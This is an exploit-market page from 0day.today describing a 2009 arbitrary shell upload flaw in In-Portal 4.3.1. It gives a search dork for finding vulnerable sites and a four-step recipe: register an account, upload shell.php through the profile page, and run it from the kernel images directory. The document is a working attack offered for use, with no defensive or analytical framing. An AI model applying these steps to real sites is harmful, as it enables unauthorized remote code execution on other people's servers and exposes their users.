[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability

Author
Mr.tro0oqy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5570
Category
web applications
Date add
27-07-2009
Platform
unsorted
====================================================
In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability
====================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :In-Portal v 4.3.1 Shell Upload Vulnerability

[+] D0rk : Powered by In-portal ® 1997-2009
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
step1: register in site 

http://www.xxx.com/path/platform/login/register.html

step2: go to your profile 

http://www.xxx.com/path/platform/my_account/my_profile.html

step3: upload shell.php

step4: get shell

http://www.xxx.com/path/kernel/images/shell.php


Demo:
-----
http://www.in-portal.net/demo
-----




#  0day.today [2024-12-26]  #